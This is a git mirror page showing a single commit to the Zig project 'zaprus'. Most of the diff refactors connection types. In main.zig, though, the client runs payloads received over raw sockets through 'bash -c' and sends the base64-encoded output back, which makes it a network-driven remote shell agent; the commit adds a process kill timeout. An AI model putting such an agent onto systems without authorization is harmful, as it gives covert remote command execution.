mirror of
https://git.robbyzambito.me/zaprus
synced 2026-02-04 08:24:52 +00:00
Compare commits
1 Commits
5b3e322b60
...
0.1.0
| Author | SHA1 | Date | |
|---|---|---|---|
| f554e7a3bb |
@@ -10,7 +10,7 @@
|
|||||||
|
|
||||||
// This is a [Semantic Version](https://semver.org/).
|
// This is a [Semantic Version](https://semver.org/).
|
||||||
// In a future version of Zig it will be used for package deduplication.
|
// In a future version of Zig it will be used for package deduplication.
|
||||||
.version = "0.0.0",
|
.version = "0.1.0",
|
||||||
|
|
||||||
// Together with name, this represents a globally unique package
|
// Together with name, this represents a globally unique package
|
||||||
// identifier. This field is generated by the Zig toolchain when the
|
// identifier. This field is generated by the Zig toolchain when the
|
||||||
|
|||||||
@@ -137,7 +137,7 @@ pub fn connect(self: Client, io: Io, payload: []const u8) !SaprusConnection {
|
|||||||
const RawSocket = @import("./RawSocket.zig");
|
const RawSocket = @import("./RawSocket.zig");
|
||||||
|
|
||||||
const SaprusMessage = @import("message.zig").Message;
|
const SaprusMessage = @import("message.zig").Message;
|
||||||
const SaprusConnection = @import("Connection.zig").Default;
|
const SaprusConnection = @import("Connection.zig");
|
||||||
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
|
const EthIpUdp = @import("./EthIpUdp.zig").EthIpUdp;
|
||||||
|
|
||||||
const std = @import("std");
|
const std = @import("std");
|
||||||
|
|||||||
@@ -1,14 +1,10 @@
|
|||||||
pub fn Chunked(comptime cs: usize) type {
|
|
||||||
return struct {
|
|
||||||
socket: RawSocket,
|
socket: RawSocket,
|
||||||
headers: EthIpUdp,
|
headers: EthIpUdp,
|
||||||
connection: SaprusMessage,
|
connection: SaprusMessage,
|
||||||
|
|
||||||
const Self = @This();
|
const Connection = @This();
|
||||||
|
|
||||||
pub const chunk_size = cs;
|
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Connection {
|
||||||
|
|
||||||
pub fn init(socket: RawSocket, headers: EthIpUdp, connection: SaprusMessage) Self {
|
|
||||||
return .{
|
return .{
|
||||||
.socket = socket,
|
.socket = socket,
|
||||||
.headers = headers,
|
.headers = headers,
|
||||||
@@ -16,7 +12,7 @@ pub fn Chunked(comptime cs: usize) type {
|
|||||||
};
|
};
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn next(self: Self, io: Io, buf: []u8) ![]const u8 {
|
pub fn next(self: Connection, io: Io, buf: []u8) ![]const u8 {
|
||||||
_ = io;
|
_ = io;
|
||||||
log.debug("Awaiting connection message", .{});
|
log.debug("Awaiting connection message", .{});
|
||||||
const res = try self.socket.receive(buf);
|
const res = try self.socket.receive(buf);
|
||||||
@@ -29,7 +25,7 @@ pub fn Chunked(comptime cs: usize) type {
|
|||||||
return connection_res.payload;
|
return connection_res.payload;
|
||||||
}
|
}
|
||||||
|
|
||||||
pub fn send(self: *Self, io: Io, buf: []const u8) !void {
|
pub fn send(self: *Connection, io: Io, buf: []const u8) !void {
|
||||||
const io_source: std.Random.IoSource = .{ .io = io };
|
const io_source: std.Random.IoSource = .{ .io = io };
|
||||||
const rand = io_source.interface();
|
const rand = io_source.interface();
|
||||||
|
|
||||||
@@ -43,7 +39,7 @@ pub fn Chunked(comptime cs: usize) type {
|
|||||||
self.headers.setPayloadLen(connection_bytes.len);
|
self.headers.setPayloadLen(connection_bytes.len);
|
||||||
|
|
||||||
var msg_buf: [2048]u8 = undefined;
|
var msg_buf: [2048]u8 = undefined;
|
||||||
var msg_w: Io.Writer = .fixed(&msg_buf);
|
var msg_w: Writer = .fixed(&msg_buf);
|
||||||
try msg_w.writeAll(&self.headers.toBytes());
|
try msg_w.writeAll(&self.headers.toBytes());
|
||||||
try msg_w.writeAll(connection_bytes);
|
try msg_w.writeAll(connection_bytes);
|
||||||
const full_msg = msg_w.buffered();
|
const full_msg = msg_w.buffered();
|
||||||
@@ -53,91 +49,9 @@ pub fn Chunked(comptime cs: usize) type {
|
|||||||
log.debug("Sent {} byte connection message", .{full_msg.len});
|
log.debug("Sent {} byte connection message", .{full_msg.len});
|
||||||
}
|
}
|
||||||
|
|
||||||
pub const Writer = struct {
|
|
||||||
connection: *Self,
|
|
||||||
io: Io,
|
|
||||||
interface: Io.Writer,
|
|
||||||
err: ?anyerror,
|
|
||||||
|
|
||||||
pub fn init(io: Io, connection: *Self, buf: []u8) Writer {
|
|
||||||
return .{
|
|
||||||
.connection = connection,
|
|
||||||
.io = io,
|
|
||||||
.interface = .{
|
|
||||||
.vtable = &.{
|
|
||||||
.drain = drain,
|
|
||||||
},
|
|
||||||
.buffer = buf,
|
|
||||||
},
|
|
||||||
.err = null,
|
|
||||||
};
|
|
||||||
}
|
|
||||||
|
|
||||||
pub fn drain(io_w: *Io.Writer, data: []const []const u8, splat: usize) Io.Writer.Error!usize {
|
|
||||||
_ = splat;
|
|
||||||
const self: *Writer = @alignCast(@fieldParentPtr("interface", io_w));
|
|
||||||
var res: usize = 0;
|
|
||||||
|
|
||||||
// Get buffered data from the writer
|
|
||||||
const buffered = io_w.buffered();
|
|
||||||
var buf_offset: usize = 0;
|
|
||||||
|
|
||||||
// Process buffered data in chunks
|
|
||||||
while (buf_offset < buffered.len) {
|
|
||||||
const current_chunk_size = @min(chunk_size, buffered.len - buf_offset);
|
|
||||||
const chunk = buffered[buf_offset..][0..current_chunk_size];
|
|
||||||
|
|
||||||
// Base64 encode the chunk
|
|
||||||
var encoded_buf: [chunk_size * 2]u8 = undefined;
|
|
||||||
const encoded_len = std.base64.standard.Encoder.calcSize(chunk.len);
|
|
||||||
const encoded = std.base64.standard.Encoder.encode(&encoded_buf, chunk);
|
|
||||||
|
|
||||||
// Send encoded chunk
|
|
||||||
self.connection.send(self.io, encoded[0..encoded_len]) catch |err| {
|
|
||||||
self.err = err;
|
|
||||||
return error.WriteFailed;
|
|
||||||
};
|
|
||||||
self.io.sleep(.fromMilliseconds(40), .boot) catch @panic("honk shoo");
|
|
||||||
|
|
||||||
buf_offset += current_chunk_size;
|
|
||||||
res += current_chunk_size;
|
|
||||||
}
|
|
||||||
|
|
||||||
// Process data slices
|
|
||||||
for (data) |slice| {
|
|
||||||
var slice_offset: usize = 0;
|
|
||||||
|
|
||||||
while (slice_offset < slice.len) {
|
|
||||||
const current_chunk_size = @min(chunk_size, slice.len - slice_offset);
|
|
||||||
const chunk = slice[slice_offset..][0..current_chunk_size];
|
|
||||||
|
|
||||||
// Base64 encode the chunk
|
|
||||||
var encoded_buf: [chunk_size * 2]u8 = undefined;
|
|
||||||
const encoded_len = std.base64.standard.Encoder.calcSize(chunk.len);
|
|
||||||
const encoded = std.base64.standard.Encoder.encode(&encoded_buf, chunk);
|
|
||||||
|
|
||||||
// Send encoded chunk
|
|
||||||
self.connection.send(self.io, encoded[0..encoded_len]) catch |err| {
|
|
||||||
self.err = err;
|
|
||||||
return error.WriteFailed;
|
|
||||||
};
|
|
||||||
self.io.sleep(.fromMilliseconds(40), .boot) catch @panic("honk shoo");
|
|
||||||
|
|
||||||
slice_offset += current_chunk_size;
|
|
||||||
res += current_chunk_size;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
return res;
|
|
||||||
}
|
|
||||||
};
|
|
||||||
};
|
|
||||||
}
|
|
||||||
|
|
||||||
pub const Default = Chunked(RawSocket.max_payload_len);
|
|
||||||
|
|
||||||
const std = @import("std");
|
const std = @import("std");
|
||||||
const Io = std.Io;
|
const Io = std.Io;
|
||||||
|
const Writer = std.Io.Writer;
|
||||||
|
|
||||||
const log = std.log;
|
const log = std.log;
|
||||||
|
|
||||||
|
|||||||
@@ -46,7 +46,7 @@ export fn zaprus_connect(
|
|||||||
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
|
const c: ?*zaprus.Client = @ptrCast(@alignCast(client));
|
||||||
const zc = c orelse return null;
|
const zc = c orelse return null;
|
||||||
|
|
||||||
const connection = alloc.create(zaprus.Connection.Default) catch return null;
|
const connection = alloc.create(zaprus.Connection) catch return null;
|
||||||
connection.* = zc.connect(io, payload[0..payload_len]) catch {
|
connection.* = zc.connect(io, payload[0..payload_len]) catch {
|
||||||
alloc.destroy(connection);
|
alloc.destroy(connection);
|
||||||
return null;
|
return null;
|
||||||
@@ -55,7 +55,7 @@ export fn zaprus_connect(
|
|||||||
}
|
}
|
||||||
|
|
||||||
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
|
export fn zaprus_deinit_connection(connection: ?*ZaprusConnection) void {
|
||||||
const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
|
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||||
if (c) |zc| {
|
if (c) |zc| {
|
||||||
alloc.destroy(zc);
|
alloc.destroy(zc);
|
||||||
}
|
}
|
||||||
@@ -67,7 +67,7 @@ export fn zaprus_connection_next(
|
|||||||
capacity: usize,
|
capacity: usize,
|
||||||
out_len: *usize,
|
out_len: *usize,
|
||||||
) c_int {
|
) c_int {
|
||||||
const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
|
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||||
const zc = c orelse return 1;
|
const zc = c orelse return 1;
|
||||||
|
|
||||||
const result = zc.next(io, out[0..capacity]) catch return 1;
|
const result = zc.next(io, out[0..capacity]) catch return 1;
|
||||||
@@ -80,7 +80,7 @@ export fn zaprus_connection_send(
|
|||||||
payload: [*c]const u8,
|
payload: [*c]const u8,
|
||||||
payload_len: usize,
|
payload_len: usize,
|
||||||
) c_int {
|
) c_int {
|
||||||
const c: ?*zaprus.Connection.Default = @ptrCast(@alignCast(connection));
|
const c: ?*zaprus.Connection = @ptrCast(@alignCast(connection));
|
||||||
const zc = c orelse return 1;
|
const zc = c orelse return 1;
|
||||||
|
|
||||||
zc.send(io, payload[0..payload_len]) catch return 1;
|
zc.send(io, payload[0..payload_len]) catch return 1;
|
||||||
|
|||||||
131
src/main.zig
131
src/main.zig
@@ -124,8 +124,8 @@ pub fn main(init: std.process.Init) !void {
|
|||||||
return;
|
return;
|
||||||
}
|
}
|
||||||
|
|
||||||
var con_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
|
var init_con_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||||
var w: Writer = .fixed(&con_buf);
|
var w: Writer = .fixed(&init_con_buf);
|
||||||
try w.print("{b64}", .{flags.connect.?});
|
try w.print("{b64}", .{flags.connect.?});
|
||||||
|
|
||||||
if (flags.connect != null) {
|
if (flags.connect != null) {
|
||||||
@@ -142,8 +142,6 @@ pub fn main(init: std.process.Init) !void {
|
|||||||
|
|
||||||
log.debug("Connection started", .{});
|
log.debug("Connection started", .{});
|
||||||
|
|
||||||
var connection_writer: zaprus.Connection.Default.Writer = .init(init.io, &connection, &con_buf);
|
|
||||||
|
|
||||||
next_message: while (true) {
|
next_message: while (true) {
|
||||||
var res_buf: [2048]u8 = undefined;
|
var res_buf: [2048]u8 = undefined;
|
||||||
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
|
try client.socket.setTimeout(if (is_debug) 60 else 600, 0);
|
||||||
@@ -162,15 +160,57 @@ pub fn main(init: std.process.Init) !void {
|
|||||||
var child = std.process.spawn(init.io, .{
|
var child = std.process.spawn(init.io, .{
|
||||||
.argv = &.{ "bash", "-c", connection_payload },
|
.argv = &.{ "bash", "-c", connection_payload },
|
||||||
.stdout = .pipe,
|
.stdout = .pipe,
|
||||||
|
.stderr = .ignore,
|
||||||
|
.stdin = .ignore,
|
||||||
}) catch continue;
|
}) catch continue;
|
||||||
|
|
||||||
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
var child_output_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
||||||
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
|
var child_output_reader = child.stdout.?.reader(init.io, &child_output_buf);
|
||||||
|
|
||||||
_ = child_output_reader.interface.stream(
|
var is_killed: std.atomic.Value(bool) = .init(false);
|
||||||
&connection_writer.interface,
|
|
||||||
.limited(@TypeOf(connection_writer.connection.*).chunk_size * 10),
|
var kill_task = try init.io.concurrent(killProcessAfter, .{ init.io, &child, .fromSeconds(3), &is_killed });
|
||||||
) catch continue :next_message;
|
defer _ = kill_task.cancel(init.io) catch {};
|
||||||
|
|
||||||
|
var cmd_output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
|
||||||
|
var cmd_output: Writer = .fixed(&cmd_output_buf);
|
||||||
|
|
||||||
|
// Maximum of 10 messages of output per command
|
||||||
|
for (0..10) |_| {
|
||||||
|
cmd_output.end = 0;
|
||||||
|
|
||||||
|
child_output_reader.interface.fill(child_output_reader.interface.buffer.len) catch |err| switch (err) {
|
||||||
|
error.ReadFailed => continue :next_message, // TODO: check if there is a better way to handle this
|
||||||
|
error.EndOfStream => {
|
||||||
|
cmd_output.print("{b64}", .{child_output_reader.interface.buffered()}) catch unreachable;
|
||||||
|
if (cmd_output.end > 0) {
|
||||||
|
connection.send(init.io, cmd_output.buffered()) catch |e| {
|
||||||
|
log.debug("Failed to send connection chunk: {t}", .{e});
|
||||||
|
continue :next_message;
|
||||||
|
};
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
},
|
||||||
|
};
|
||||||
|
cmd_output.print("{b64}", .{try child_output_reader.interface.takeArray(child_output_buf.len)}) catch unreachable;
|
||||||
|
connection.send(init.io, cmd_output.buffered()) catch |err| {
|
||||||
|
log.debug("Failed to send connection chunk: {t}", .{err});
|
||||||
|
continue :next_message;
|
||||||
|
};
|
||||||
|
try init.io.sleep(.fromMilliseconds(40), .boot);
|
||||||
|
} else {
|
||||||
|
kill_task.cancel(init.io) catch {};
|
||||||
|
killProcessAfter(init.io, &child, .zero, &is_killed) catch |err| {
|
||||||
|
log.debug("Failed to kill process??? {t}", .{err});
|
||||||
|
continue :next_message;
|
||||||
|
};
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!is_killed.load(.monotonic)) {
|
||||||
|
_ = child.wait(init.io) catch |err| {
|
||||||
|
log.debug("Failed to wait for child: {t}", .{err});
|
||||||
|
};
|
||||||
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -178,73 +218,14 @@ pub fn main(init: std.process.Init) !void {
|
|||||||
unreachable;
|
unreachable;
|
||||||
}
|
}
|
||||||
|
|
||||||
// const ConnectionWriter = struct {
|
fn killProcessAfter(io: std.Io, proc: *std.process.Child, duration: std.Io.Duration, is_killed: *std.atomic.Value(bool)) !void {
|
||||||
// connection: *zaprus.Connection,
|
io.sleep(duration, .boot) catch |err| switch (err) {
|
||||||
// io: std.Io,
|
error.Canceled => return,
|
||||||
// interface: Writer,
|
else => |e| return e,
|
||||||
// err: ?anyerror,
|
};
|
||||||
|
is_killed.store(true, .monotonic);
|
||||||
// pub fn init(io: std.Io, connection: *zaprus.Connection) ConnectionWriter {
|
proc.kill(io);
|
||||||
// return .{
|
}
|
||||||
// .connection = connection,
|
|
||||||
// .io = io,
|
|
||||||
// .interface = .{},
|
|
||||||
// };
|
|
||||||
// }
|
|
||||||
|
|
||||||
// pub fn drain(io_w: *Writer, data: []const []const u8, splat: usize) Writer.Error!usize {
|
|
||||||
// var res: usize = 0;
|
|
||||||
// const w: *ConnectionWriter = @alignCast(@fieldParentPtr("interface", io_w));
|
|
||||||
// var buffered_reader: std.Io.Reader = .fixed(io_w.buffered());
|
|
||||||
// const io = w.io;
|
|
||||||
|
|
||||||
// // Collect the output in chunks
|
|
||||||
// var output_buf: [SaprusClient.max_payload_len * 2]u8 = undefined;
|
|
||||||
// var output_writer: Writer = .fixed(&output_buf);
|
|
||||||
// while (buffered_reader.end - buffered_reader.seek > SaprusClient.max_payload_len) {
|
|
||||||
// output_writer.end = 0;
|
|
||||||
// output_writer.print("{b64}", .{&buffered_reader.takeArray(SaprusClient.max_payload_len)});
|
|
||||||
// self.connection.send(io, output_writer.buffered()) catch |err| {
|
|
||||||
// self.err = err;
|
|
||||||
// return error.WriteFailed;
|
|
||||||
// };
|
|
||||||
// res += SaprusClient.max_payload_len;
|
|
||||||
// }
|
|
||||||
// // accumulate the remainder of buffered and the data slices before writing b64 to the output_writer
|
|
||||||
// var output_acc_buf: [SaprusClient.max_payload_len]u8 = undefined;
|
|
||||||
// var output_acc_w: Writer = .fixed(&output_acc_buf);
|
|
||||||
|
|
||||||
// // We can write the rest of buffered_reader to the output_writer because we know after
|
|
||||||
// // the previous loop the maximum length of the remaining data is SaprusClient.max_payload_len.
|
|
||||||
// output_writer.end = 0;
|
|
||||||
// res += output_acc_w.write(buffered_reader.buffered()) catch unreachable;
|
|
||||||
|
|
||||||
// for (data[0 .. data.len - 1]) |chunk| {
|
|
||||||
// if (chunk.len < SaprusClient.max_payload_len - output_acc_w.end) {
|
|
||||||
// res += output_acc_w.write(chunk) catch unreachable;
|
|
||||||
// continue;
|
|
||||||
// }
|
|
||||||
// var chunk_reader: std.Io.Reader = .fixed(chunk);
|
|
||||||
// while (chunk_reader.end - chunk_reader.seek > 0) {
|
|
||||||
// res += chunk_reader.stream(
|
|
||||||
// &output_acc_w,
|
|
||||||
// .limited(SaprusClient.max_payload_len - output_acc_w.end),
|
|
||||||
// ) catch unreachable;
|
|
||||||
// if (SaprusClient.max_payload_len - output_acc_w.end == 0) {
|
|
||||||
// output_writer.print("{b64}", .{output_acc_w.buffered()});
|
|
||||||
// output_acc_w.end = 0;
|
|
||||||
// self.connection.send(io, output_writer.buffered()) catch |err| {
|
|
||||||
// self.err = err;
|
|
||||||
// return error.WriteFailed;
|
|
||||||
// };
|
|
||||||
// output_writer.end = 0;
|
|
||||||
// }
|
|
||||||
// }
|
|
||||||
// }
|
|
||||||
|
|
||||||
// return res;
|
|
||||||
// }
|
|
||||||
// };
|
|
||||||
|
|
||||||
fn parseDest(in: ?[]const u8) [4]u8 {
|
fn parseDest(in: ?[]const u8) [4]u8 {
|
||||||
if (in) |dest| {
|
if (in) |dest| {
|
||||||
|
|||||||
Reference in New Issue
Block a user